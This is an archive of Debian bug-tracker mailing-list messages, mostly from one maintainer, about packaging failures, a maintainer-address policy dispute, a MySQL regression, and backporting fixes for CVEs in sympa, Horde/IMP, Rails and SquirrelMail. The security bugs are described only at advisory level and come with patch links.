To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#675971: what should we be doing?

[micah anderson]

Is the situation that all users that are at 1.2.3-348 and older can
speak to each other and all users that are at 1.2.3-349 and greater can
speak to each other, but =349 cannot speak to =348 users?

If so, is the intended plan for everyone to bump up to =349?

If that is true, at the very least this warrants a NEWS entry.

micah
-- 




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#666865: Unarchive: The problem still persists

[micah anderson]

Arno Töll a...@debian.org writes:

 Hi,

 On 24.05.2012 19:12, micah anderson wrote:
 Do you have a way of testing this? I've set up something that I believe
 should let the messages through based on the X-Loop header, but need to
 test that it is working.
 
 There was a mistake in what was done, but that has been fixed now.

 Well, basically I will reply to you through the BTS. If my message
 reaches you, the problem seems fixed (pretending you didn't whitelist me
 explicitly given I'm the only one to complain :).

It looks like this went through fine on my end. 

Shall we close the bug?

micah



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#666865: Unarchive: The problem still persists

[micah anderson]

Arno Töll a...@debian.org writes:
 Hello,

 reopening the bug as the problem still persists.

Do you have a way of testing this? I've set up something that I believe
should let the messages through based on the X-Loop header, but need to
test that it is working.

micah



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#666865: Unarchive: The problem still persists

[micah anderson]

micah anderson mi...@riseup.net writes:

 Arno Töll a...@debian.org writes:
 Hello,

 reopening the bug as the problem still persists.

 Do you have a way of testing this? I've set up something that I believe
 should let the messages through based on the X-Loop header, but need to
 test that it is working.

There was a mistake in what was done, but that has been fixed now.

micah



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#666865: bug mail bounces

[micah anderson]

Stefan Fritsch s...@sfritsch.de writes:

 Hi,

 I think the problem is that you can't match on the Sender or From 
 headers, because those remain unmodified for BTS mail. But BTS mail 
 seems to have

 X-Loop: ow...@bugs.debian.org

 and

 X-Debian-PR-Source: name-of-source-package

 Maybe you can match on either of those.

I can't think of any mailing list software that allows for matching on
headers to allow messages to the list. 

Seeing as its not an uncommon scenario for group maintained packages to
use a mailing list for their communication, and receiving to the mailing
list bugs from the tracker is important, this restriction seems a
problem.




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#672893: security: private archives available to all

[Micah Anderson]

Package: sympa
Version: 6.0.1+dfsg-4
Severity: grave
Tags: security patch
Justification: user security hole

It is possible to open the archive management (arc_manage) page
for any list, even those set to only be available to members,
giving anyone the option to download the archive, or delete the
archive.

http://www.sympa.org/distribution/latest-stable/NEWS 

Patch for the version in stable:
https://sourcesup.renater.fr/scm/viewvc.php/branches/sympa-6.0-branch/wwsympa/wwsympa.fcgi.in?root=sympar1=6706r2=7358pathrev=7358

Please reference CVE-2012-2352 in any changelogs addressing this issue.

micah

System Information:
Debian Release: wheezy/sid
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#666865: Unarchive: The problem still persists

[micah anderson]

On Sun, 06 May 2012 12:17:04 +0200, Arno Töll a...@debian.org wrote:
 Hi Micah,
 
 On 06.05.2012 06:13, micah anderson wrote:
  What address is not working? I looked around for a canonical list of
  role addresses that should accept emails, but I couldn't find one, so I
  gathered as many as I could and added them.
 
 Policy says in §3.3: The email address given in the Maintainer control
 field must accept [..] non-spam mail from the bug-tracking system.

Yes, I am aware of that policy section that lacks any specifics.

 However, you don't as you are dropping mail from people who contact you
 through the BTS (i.e. not over explicit carbon copies).

I'm afraid I don't understand what that means. How do people contact me
through the BTS? If its not through debb...@bugs.debian.org,
debb...@busoni.debian.org, nore...@release.debian.org,
ow...@bugs.debian.org, or ow...@busoni.debian.org then I do not
understand how an individual can contact a package's listed address
through the BTS. 

I'm sorry I must seem dense here, but perhaps you could provide me with
an example?

 This makes it impossible to contact you over the BTS. If you really
 think such sender restrictions make sense, you should at least make
 sure you do accept mail from people sent via the BTS, e.g. by
 whitelisting mail from the BTS mail server (busoni.debian.org).

I wont whitelist the entire BTS mail server, not without a more narrow
definition of where things are coming from. 

micah


-- 




--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#666865: Unarchive: The problem still persists

[micah anderson]

On Sat, 05 May 2012 19:04:06 +0200, Arno Töll a...@debian.org wrote:
 Hello,
 
 reopening the bug as the problem still persists.

What address is not working? I looked around for a canonical list of
role addresses that should accept emails, but I couldn't find one, so I
gathered as many as I could and added them.

I've added:

d...@ftp-master.debian.org
debb...@bugs.debian.org 
debb...@busoni.debian.org
debian-bugs-d...@lists.debian.org
f...@debian.org 
instal...@ftp-master.debian.org
nore...@release.debian.org
ow...@bugs.debian.org 
ow...@busoni.debian.org 
ow...@packages.qa.debian.org
p...@qa.debian.org
q...@master.debian.org

but that isn't covering it, so I'd like to know what other one is
needed.

micah



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#660206: [debian-mysql] Bug#660206: This is a regression

[micah anderson]

On Mon, 09 Apr 2012 10:21:08 -0700, Clint Byrum cl...@fewbar.com wrote:
 Excerpts from micah anderson's message of Sun Apr 08 10:13:40 -0700 2012:
  severity 660206 serious
  thanks
  
  This is actually a regression, the only way to get things to work again
  is to downgrade package like such:
  
  apt-get install mysql-server-5.1=5.1.49-3 mysql-client-5.1=5.1.49-3
  mysql-common=5.1.49-3 mysql-server-core-5.1=5.1.49-3
  libmysqlclient16=5.1.49-3
  
  micah
  
 
 So, I'm not sure I agree that this is such a serious
 regression. 

I would agree that this is not a *very* serious regression, but its a
regression nonetheless. In my opinon an un intenteded regression is not
suitable for release as a security upload and should be replaced as soon
as a fix becomes available.

*lenny* shipped with rails 2.1.0. 1.2.6 was released in 2007, and is
not supported in Debian at all. The referenced upstream bug talks about
using client versions older than 4.1, which is basically ancient.

I agree. However, the reality is that the security upgrade brought in
unrelated changes to the security upgrade and caused unrelated software
to break.

 I'm not disputing that this is a regression introduced by the upstream
 jump to 5.1.61, but I don't know that its worth downgrading and losing
 security updates for. Perhaps the client libraries should be updated to
 something that is still supported by upstream and/or Debian.

The two choices here are to either downgrade mysql, or to upgrade client
libraries. While it seems sensible to upgrade client libraries to a
newer supported version, one should not have to do that because of a
security upgrade of another package. That option takes you from the
realm of routine security maintainence into the much more serious realm
of migrating completely other software to new client libraries that
would require a significant architecture overhaul (I dont know how much
you know about rails, but the difference between 2.1 and 2.2 is not a
trivial minor release, but typically involves almost a complete
rewrite). During a maintainence window, when you are expecting to only
do an isolated security upgrade of a package, the last thing the
sysadmin who is performing the upgrade is going to do is to re-write
some other code to deal with a surprise regression in the security
package. 

So while I do agree with you that the 'right' thing to do is to get the
software updated to newer client libraries, rather than to have exposed
security holes, the reality is that until that can happen (and in one
case that I am dealing with, that re-write is in progress, but is 6
months out) I would hope that stable-security or a stable update would
include a fix to this regression, when it comes available. 

micah

-- 




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#666865: libapache-mod-removeip: Maintainer address does not accept mail from role accounts

[micah anderson]

 The maintainer address you added to your package does not accept mail
 from role accounts, including but not limited to the bug tracking
 system. This is a policy violation as of §3.3: The email address given
 in the Maintainer control field must accept mail from those role
 accounts in Debian used to send automated mails regarding the package.
 This includes non-spam mail from the bug-tracking system, all mail from
 the Debian archive maintenance software, and other role accounts or
 automated processes that are commonly agreed on by the project.

Thanks, i've updated the allow list, unfortunately there doesn't seem
to be a good canonical list of the aliases that are needed, it would be
a good idea to have that so people can properly follow policy.

micah


pgpxvBcPlUQ8J.pgp
Description: PGP signature

Bug#666865: libapache-mod-removeip: Maintainer address does not accept mail from role accounts

[micah anderson]

 The maintainer address you added to your package does not accept mail
 from role accounts, including but not limited to the bug tracking
 system. This is a policy violation as of §3.3: The email address given
 in the Maintainer control field must accept mail from those role
 accounts in Debian used to send automated mails regarding the package.
 This includes non-spam mail from the bug-tracking system, all mail from
 the Debian archive maintenance software, and other role accounts or
 automated processes that are commonly agreed on by the project.

Thanks, i've updated the allow list, unfortunately there doesn't seem
to be a good canonical list of the aliases that are needed, it would be
a good idea to have that so people can properly follow policy.

micah



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#659392: Some information

[micah anderson]

On Tue, 14 Feb 2012 19:22:29 -0500, micah anderson mi...@riseup.net wrote:
 CVE-2012-0791 has a simple changeset:

Sorry, I switched these CVE issues, this one is actually CVE-2012-0909

 https://github.com/horde/horde/commit/208eae43c95136a67104f760027a8892a22b6e25
 
 it touches two files: 
 framework/Form/lib/Horde/Form/Type.php
 framework/Form/package.xml
 
 neither of these files is in horde3 or imp4 that is in Squeeze.
 
 For the other issue CVE-2012-0909, that seems to affect Squeeze's IMP,

this one is actually CVE-2012-0791.

 and a changeset between version 4.3.10 and 4.3.11 was published here:
 http://ftp.horde.org/pub/imp/patches/patch-imp-h3-4.3.10-h3-4.3.11.gz
 
 Squeeze has 4.3.7 - I've looked at the changeset above with a co-worker
 and it does not look too hard to port to the debian version. We'll do so
 in the next couple of days if nobody else does first.

have a patch, testing it now.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#659392: Info received (debdiff)

[micah anderson]

On Wed, 15 Feb 2012 13:57:55 -0500, micah mi...@algae.riseup.net wrote:
 
 Attached is a debdiff against the squeeze version to fix imp4.

I forgot to mention that I've built a package off of this diff and
tested it and it seems to work fine (I have no way of testing that the
XSS issue is fixed).

mich



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#659392: Some information

[micah anderson]

I've been trying to figure out if this issue affects stable.

The issues point to this openwall post:
http://www.openwall.com/lists/oss-security/2012/01/22/2

which has actual git commits for things.

CVE-2012-0791 has a simple changeset:

https://github.com/horde/horde/commit/208eae43c95136a67104f760027a8892a22b6e25

it touches two files: 
framework/Form/lib/Horde/Form/Type.php
framework/Form/package.xml

neither of these files is in horde3 or imp4 that is in Squeeze.

For the other issue CVE-2012-0909, that seems to affect Squeeze's IMP,
and a changeset between version 4.3.10 and 4.3.11 was published here:
http://ftp.horde.org/pub/imp/patches/patch-imp-h3-4.3.10-h3-4.3.11.gz

Squeeze has 4.3.7 - I've looked at the changeset above with a co-worker
and it does not look too hard to port to the debian version. We'll do so
in the next couple of days if nobody else does first.

micah


-- 



pgpgDDdP8MDbA.pgp
Description: PGP signature

Bug#657942: frei0r-plugins: Cannot install

[Micah Anderson]

Package: frei0r-plugins
Version: 1.1.22git20091109-1.1
Severity: serious

Its impossible to install this package.

The following packages have unmet dependencies:
 frei0r-plugins : Depends: libcvaux2.1 but it is not installable
  Depends: libhighgui2.1 but it is not installable

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages frei0r-plugins depends on:
ii  libc6  2.13-24
ii  libcv2.1   2.1.0-7+b2
ii  libcvaux2.1none
ii  libgavl1   none
ii  libgcc11:4.6.2-12
ii  libhighgui2.1  none
ii  libstdc++6 4.6.2-12

frei0r-plugins recommends no packages.

frei0r-plugins suggests no packages.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#653107: Should this package be removed?

[micah anderson]

On Fri, 23 Dec 2011 23:40:20 +0100, Moritz Muehlenhoff j...@debian.org wrote:
 Package: util-vserver
 Severity: serious
 
 util-vserver hasn't seen an upload since 1.5 years and vserver support
 has been dropped from the Debian kernels post-Squeeze.
 
 Should util-vserver be removed as well?

I'm not sure. Before the kernel team started providing vserver kernels,
I was providing a kernel source patch set, which still require the
user-space utilities to exist. 

I haven't decided if I will do that again, it depends on lxc maturing
enough to be a usable alternative, which so far it has not and until it
does, I'm not convinced that vservers should go away in debian.





pgpIFbRGLaoDp.pgp
Description: PGP signature

Bug#629998: Conflicting st binary name

[micah anderson]

Hi,

It was written:

  
 We're also tossing around changing the OpenStack 'st' to
 'swiftly'. Whatever it becomes, it'll likely happen in our next
 release, 1.4.1. 

It appears that 1.4.3 is the latest version, with 1.4.4 coming. Did this
rename happen, and if so, can we resolve this issue (perhaps by
uploading a new version?)

thanks!
micah

ps - thanks for your work on this project, and zigo for the packaging!

-- 



pgpmMLwQhaLBY.pgp
Description: PGP signature

Bug#629998: Conflicting st binary name

[micah anderson]

On Mon, 26 Sep 2011 23:33:50 +0800, Thomas Goirand tho...@goirand.fr wrote:
 On 09/26/2011 10:43 PM, Gregory Holt wrote:
  Yes, the rename did happen: st - swift
  
  I'm not sure who/how the Debian packaging for OpenStack Swift is
  handled, but I expect they're listed on this bug so probably got emailed.
 
 Hi,
 
 I have seen that Glance and Swift are now released (code name Diablo,
 version 2011.3 for Glance, and 1.4.4 for Swift).
 
 I have seen that both Glance and Swift seems ok for an upload, but I
 want to do functional testing of them before the upload, and for the
 moment, Nova fails with its unit tests. So please bare with me and allow
 a bit more of time, so that I can make my tests before the uploads.

Seems reasonable!

 FYI, OpenStack got released last Friday, and I'm only discovering what's
 new in this release. It's not exactly a very simple thing, so it may
 take some time until I can upload.

Oh wow, I had no idea it was just realeased! I didn't mean to pressure
you :)

 Also, there's now an Alioth project for it, and I'd be very happy to
 have help on releasing this new version in Debian.

I can't commit to helping there now, i'm trying to get rid of some
commitments now because I am overextended. Depending on how that goes,
and if we decide to use OpenStack, I will keep that in mind!

thanks again for your work on this, its very much appreciated!

micah


pgphMnPedDlZl.pgp
Description: PGP signature

Bug#614864: ping?

[micah anderson]

Hi folks,

This security issue really needs to be dealt with, I'm concerned that we
are getting close to one month from when the bug was first reported to
the BTS, we are already over one month from when the bug was reported
upstream.

I'm looking for any feedback on the work I did...

micah

-- 



pgpT5pKpqyUzU.pgp
Description: PGP signature

Bug#614864: patch

[micah anderson]

Hi, 

I decided to help a little bit moving these issues forward. I did what I
could, but now the more experienced debian rails people need to act. In
particular, there is a decision that needs to be made for CVE-2011-0446,
and a review of the fix I did for CVE-2011-0447. I am happy to help
facilitate in any other way, but I need others who have more experience
to weigh in on those.

Both of these CVEs affect all versions of rails, including those in
oldstable.

CVE-2011-0446
-

Patch for rails 2.3 to fix CVE-2011-0446 is here:

http://rubyonrails-security.googlegroups.com/attach/365b8a23b76a6b4a/2-3-mailto.patch?part=3

The upstream commit id is: abe97736b8316f1b714cac56c115c0779aa73217

Looking through the commit log for the above fix, it was done to rails
2.3.11, which has had three other commits that touched
actionpack/lib/action_view/helpers/url_helper.rb, the largest one is
9ca6df83f606a0fb8be3815328111d0cdaa7c65b which backports html_safe and
the latest rails_xss plugin. This change seems to be a pre-requisite for
the security fix, the sad thing is that it is a big change.

I did not do anything with CVE-2011-0446 as it was intrusive, hopefully
others who have experience with this package can weigh in on the best
way forwards with this one. Once this is resolved a security release
could happen.


CVE-2011-0447
-

The patch for rails 2.1 to fix CVE-2011-0447 is here:

http://rubyonrails-security.googlegroups.com/attach/c22ea1668c0d181c/2-1-csrf.patch?part=3

I was able to cherry-pick this commit
(d622353dd399908770473d417ecef028524b8c8b) from upstream's git repo into
the debian debian-lenny branch without any conflicts. I went ahead and
did that and have committed it, along with a changelog entry and a NEWS
entry that comes straight from the mailing list.

It is my opinion that the fix for lenny in 2.1 is done. Please someone
who has more skills in rails review this to make sure it is good, and
then I think it can be uploaded after contacting the security team.


The patch for rails 2.3 to fix CVE-2011-0447 is here:

http://rubyonrails-security.googlegroups.com/attach/c22ea1668c0d181c/2-3-csrf.patch?part=5

I was able to cherry-pick this commit
(9998f79b9cf9c60b07baf4c23a02178034e06d85) from upstream's git repo into
the debian v2.3-stable branch without any conflicts. I also went ahead
and committed this change, along with a changelog entry and a NEWS entry
that came from the mailing list, identical to the debian-lenny 2.1 one
above. 

Once CVE-2011-0446 has been resolved for 2.3, then this can be uploaded.

A few notes:

1. I noticed that the upload that made it into squeeze was never tagged
as debian/2.3.5-1.2, so I went ahead and did that.

2. I wasn't sure what the difference between the branch 'debian-lenny'
and v2.1-stable were. The 'debian-lenny' one seemed to have the most
recent security fixes, and had a debian directory, so I went with that
one.

3. v2.3-stable seemed to be the place for squeeze fixes, which differs
from the nomenclature used in #2, perhaps that fix should be in a
debian-squeeze branch? If so, then please change it, and clarify #2 for
v2.3-stable too.


Micah



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#603882: util-vserver: startup script breaks boot (on sparc)

[micah anderson]

On Thu, 18 Nov 2010 04:13:20 +0100 (CET), Daniel Hokka Zakrisson 
dan...@hozac.com wrote:

 What dietlibc version was used to build the binaries? Does it have
 http://people.linux-vserver.org/~dhozac/p/m/delta-dietdirent-fix01.diff
 applied? IIRC this was one way that problem exhibited itself.

Looking at the build logs for sparc, it looks like 0.32-5 of dietlibc
was used. Looking at the debian source for that version of dietlibc, and
comparing it to the patch you reference, no it was not applied.

That patch is odd, all it does is move the int below the 

char buf[PAGE_SIZE-(sizeof (int)*3)];

what is going on there?

micah


pgpJlxeUlvxFV.pgp
Description: PGP signature

Bug#603882: util-vserver: startup script breaks boot (on sparc)

[micah anderson]

On Thu, 18 Nov 2010 04:13:20 +0100 (CET), Daniel Hokka Zakrisson 
dan...@hozac.com wrote:

 What dietlibc version was used to build the binaries? Does it have
 http://people.linux-vserver.org/~dhozac/p/m/delta-dietdirent-fix01.diff
 applied? IIRC this was one way that problem exhibited itself.

Actually, I lied. The patch *is* applied. I was looking at the unpatched
source, but if I looked at the patched source before its built, it is in
fact there.

micah


pgpQ00Mmbq6M7.pgp
Description: PGP signature

Bug#600206: libcompass-ruby: compass apparently completely broken

[micah anderson]

On Tue, 16 Nov 2010 15:18:56 +0530, Deepak Tripathi dee...@debian.org wrote:
 Hi Steve,
 
 Sorry for delay; i was on vacation to India (Raj).
 
 Yes actually popcon is very low for libcompass-ruby but i will still discuss
 with Micah Anderson mi...@debian.org who is the primary maintainer for
 this module and will update about his thought to the bug reports asap.

I dont mind it being removed from testing.

micah


pgpCkTCMo8OfX.pgp
Description: PGP signature

Bug#593465: Please try

[micah anderson]

On Thu, 21 Oct 2010 13:15:58 +0200 (CEST), Jan Kontze kon...@ub.fu-berlin.de 
wrote:
 
 Hi Micah,
 
 
 I Wrote:
 
  Hi Micah!
   Hi, I just posted a follow-up to the Debian bug you reported about the
   squirrelmail security regression. I neglected to CC you, so you probably
   didn't know about it. But could you have a look and try the fixed
   package that I've uploaded and then report back to the bug report?
   For your convience, I'm speaking of this one:
   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=593465
   thanks!
   micah
  Yes, your fix (gotten from:
  http://people.debian.org/~micah/squirrelmail_1.4.15-4+lenny4_all.deb)
  seems to solve the problem with 8-bit char passwords in my setup - I could
  log in without problem into squirrelmail with such a password.
  Thank you a lot! :-)
 
 the new package seems to have a negative side effect: the search via
 squirrelmail now gives an error and yields no results any more.

What I see is this when I search:

ERROR: Could not complete request.
Query: FETCH (FLAGS UID RFC822.SIZE INTERNALDATE BODY.PEEK[HEADER.FIELDS (Date 
To Cc From Subject X-Priority Importance Priority Content-Type)])
Reason Given: Error in IMAP command received by server.

Is that the same as you?

micah


pgpTd6kMPrg8u.pgp
Description: PGP signature

Bug#593465: found where function was added upstream

[Micah Anderson]

I looked at the SM upstream source for their SM-1_4-STABLE branch, and
found that they added this function Mon Jul 27, 2009, as evidenced here:

http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/imap_general.php?r1=13733r2=13789

Considering that the version of SM that is in Lenny was uploaded in
December of 2008, the sqimap_run_literal_command would not have been
there thus would need to be added for the security update.

It looks like the update that Thijs prepared[0] added that function. Why
it doesn't work is what needs to be determined.

micah


0. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=593465#10

-- 



pgpj67JsVUpmS.pgp
Description: PGP signature

Bug#593465: tried the fix too

[Micah Anderson]

I tried the fixed package too, and I got the same error as reported by
Jan Kontze. I'm running courier imapd from Lenny, and perdition. 

I looked at the fix some more on the SM websvn, and I think I found a
missing hunk that was applied at the same time the security fix was, but
is *not* in the debian package:

216a218,221
   {
   $response = 'OK';
   break 2;
   }

I just applied that on top of Thijs' fixed package, and then attempted
to login with a user with an 8-bit character in their password, and it
worked. I think that if this hunk was added along with the missing
function that was included in Thijs' package, it should solve the
regression. 

micah


-- 



pgpg0CzoEAdBc.pgp
Description: PGP signature

Bug#593465: Try this fixed package

[Micah Anderson]

I've uploaded a package that includes my fix, it seems to be working
well for me. If other people on this bug report can try it to see if it
works for them, that would be helpful.

you can get the package here:

http://people.debian.org/~micah/squirrelmail_1.4.15-4+lenny4_all.deb

note: source packages are in the same directory.

micah

-- 



pgpwLbgtiIOd0.pgp
Description: PGP signature

Bug#598074: additionally produces this error

[Micah Anderson]

r...@nuthatch:~# /etc/init.d/ipsec stop
Stopping strongSwan IPsec failed: starter is not running
/etc/init.d/ipsec: line 96: return: : numeric argument required

micah




pgpcnkLasa1kc.pgp
Description: PGP signature

Bug#595432: perdition: Missing dependency: make

[Micah Anderson]

Package: perdition
Version: 1.17.1-2
Severity: serious
Justification: Policy 3.5

I tried to install my backport of perdition onto my lenny box and got this:

(Reading database ... 36581 files and directories currently installed.)
Preparing to replace perdition 1.17.1-2 (using 
perdition_1.19~rc3-1~bpo50+1_i386.deb) ...
/var/lib/dpkg/info/perdition.prerm: line 6: make: command not found

Unpacking replacement perdition ...
dpkg: error processing perdition (--install):
 dependency problems - leaving unconfigured
Processing triggers for man-db ...
Errors were encountered while processing:
 perdition

hrm, looks like perdition requires make in the postinst. Perhaps this could be 
fixed in a point release?

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#587913: libcompass-ruby: package broken

[micah anderson]

tag 587913 +moreinfo
tag 587913 +unreproducible
severity 587913 normal
thanks

On Fri, 02 Jul 2010 18:00:30 +0200, Christophe Moille whil...@doomfr.com 
wrote:
 Package could not be installed. 
 
 The following information may help to resolve the situation:

Can you provide more information about how your apt preferences/policies
and sources are setup? You seem to be running a mixed stable/testing
environment? 

I have no problem installing.

 The following packages have unmet dependencies:
   libcompass-ruby: Depends: libcompass-ruby1.8 but it is not going to be 
 installed
Depends: libfssm-ruby but it is not going to be installed

This doesn't happen to me, instead it looks like this to me:

algae:/home/micah# apt-get install libcompass-ruby
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following extra packages will be installed:
  libcompass-ruby1.8 libfssm-ruby
The following NEW packages will be installed:
  libcompass-ruby libcompass-ruby1.8 libfssm-ruby
0 upgraded, 3 newly installed, 0 to remove and 1 not upgraded.
Need to get 402kB of archives.
After this operation, 1,790kB of additional disk space will be used.
Do you want to continue [Y/n]? 
Get:1 http://debian.lcs.mit.edu sid/main libcompass-ruby1.8 0.8.17debian-1 
[385kB]
Get:2 http://debian.lcs.mit.edu sid/main libfssm-ruby 0.1.4-2 [3,060B]
Get:3 http://debian.lcs.mit.edu sid/main libcompass-ruby 0.8.17debian-1 [13.1kB]
Fetched 402kB in 0s (705kB/s)   
Selecting previously deselected package libcompass-ruby1.8.
(Reading database ... 299065 files and directories currently installed.)
Unpacking libcompass-ruby1.8 (from 
.../libcompass-ruby1.8_0.8.17debian-1_all.deb) ...
Selecting previously deselected package libfssm-ruby.
Unpacking libfssm-ruby (from .../libfssm-ruby_0.1.4-2_all.deb) ...
Selecting previously deselected package libcompass-ruby.
Unpacking libcompass-ruby (from .../libcompass-ruby_0.8.17debian-1_all.deb) ...
Setting up libcompass-ruby1.8 (0.8.17debian-1) ...
Setting up libfssm-ruby (0.1.4-2) ...
Setting up libcompass-ruby (0.8.17debian-1) ...
algae:/home/micah#



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#577366: [Pkg-puppet-devel] Bug#577366: Bug#577366: puppet: FTBFS: install: invalid user `puppet'

[micah anderson]

On Fri, 16 Apr 2010 14:23:25 +1000, Andrew Pollock apoll...@debian.org wrote:
 On Sun, Apr 11, 2010 at 10:15:14AM +0200, Lucas Nussbaum wrote:
   install -Dp -m0644 -o puppet -g puppet ext/rack/files/config.ru \
 
   /build/user-puppet_0.25.4-3-amd64-zxBvTe/puppet-0.25.4/debian/puppetmaster/usr/share/puppet/rack/puppetmasterd
   install: invalid user `puppet'
   make: *** [install] Error 1
  
 
 Looks like this was introduced in commit
 93a3ed1e3b70fe394f7ac96c235d527347ad57d2.
 
 Micah, the brown paper bag is all yours ;-)

Right, however I'm afraid your solution to this issue was not the right
one. We actually *do* want the config.ru file owned by the user puppet
because passenger will suid to that user.

Perhaps a better answer would be to do this in a postinst?

micah



pgpLbCJcPPyla.pgp
Description: PGP signature

Bug#574532: libffi-ruby: FTBFS: missing build-dep on ruby1.9.1

[micah anderson]

On Thu, 18 Mar 2010 17:06:51 -0400, Aaron M. Ucko u...@debian.org wrote:
 Package: libffi-ruby
 Version: 0.6.2debian-4
 Severity: serious
 Justification: fails to build from source
 
 Hi, Micah!
 
 libffi-ruby fails to build because it tries to run ruby1.9.1 but
 build-depends instead on the old ruby1.9 package:
 
 /usr/bin/ruby1.9.1 debian-setup.rb config --installdirs=std
 make: /usr/bin/ruby1.9.1: Command not found
 make: *** [install/libffi-ruby1.9.1] Error 127
 
 Could you please correct that?

Yes, certainly. thanks for letting me know. I have one other bug I need
to resolve before I can upload, but I expect to do it soon.

 Also, please correct the libffi-ruby binary package's dependency to be
 on libffi-ruby1.8 rather than libruby1.8.  (Likewise for
 libcompass-ruby, libfssm-ruby and librb-inotify-ruby; please let me
 know if you'd like me to file separate reports for them.)

It seems that when you re-use things, you tend to copy all the bugs
too. I'll fix these as well. 

micah



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#574142: [DRE-maint] Bug#574142: merb non-DSFG

[micah anderson]

 Packaging updated, see changelog: 
   
   
   
 http://github.com/opscode/opscode-packages/tree/master/debian/merb/Debian 
   
   
   
 Cc tfheen for upload sponsorship. 
   

This package is in the debian-ruby-extras team svn repository and was
updated last night to fix this issue. I had uploaded it, but the
orig.tar.gz in the archive didn't match the one that was generated by my
uscan, so it got rejected.

I'm re-doing that upload now.

The difference between the change in the github repository and the svn
repository is pretty minor, they are effectively identical. The only
difference is the change is done in the team's svn repository. It
appears you've done the work on the package in the past, do you have
access to commit to the svn repository?

micah


pgpzCuY3PlQ33.pgp
Description: PGP signature

Bug#558685: some more information and patch on rails issues

[Micah Anderson]

* Steffen Joeris steffen.joe...@skolelinux.de [2010-01-30 17:13-0500]:
 Hi Adam
 
 These issues have been assigned CVE ids, see below:
 
 CVE-2009-4214[0]:
 | Cross-site scripting (XSS) vulnerability in the strip_tags function in
 | Ruby on Rails before 2.2.s, and 2.3.x before 2.3.5, allows remote
 | attackers to inject arbitrary web script or HTML via vectors involving
 | non-printing ASCII characters, related to HTML::Tokenizer and
 | actionpack/lib/action_controller/vendor/html-scanner/html/node.rb.
 
 CVE-2008-7248[1]:
 | Ruby on Rails 2.1 before 2.1.3 and 2.2.x before 2.2.2 does not verify
 | tokens for requests with certain content types, which allows remote
 | attackers to bypass cross-site request forgery (CSRF) protection for
 | requests to applications that rely on this protection, as demonstrated
 | using text/plain.
 
 CVE-2008-7248 does not seem to affect lenny since it does not include 'text' 
 in 
 the @@unverifiable_types. The upstream patch for this issue is here[2] and 
 needs to be included in the sid version.

I can confirm that the lenny version does not include 'text' in the
@@unverifiable_types in the mime_type.rb.

I also can confirm that the sid/squeeze version contains 'text', and
thus they are affected and need updating.

 CVE-2009-4214 affects lenny as well and the upstream patch is here[3], please 
 have a deeper look at that change, because I didn't. :)

I can confirm that this one affects lenny.

It also affects the sid/squeeze version, so this will need to be updated
as well.

 I guess due to CVE-2009-4214 we could fix this via a DSA. When you prepare 
 the 
 updated packages for lenny, please also include a fix for CVE-2009-3086[4].

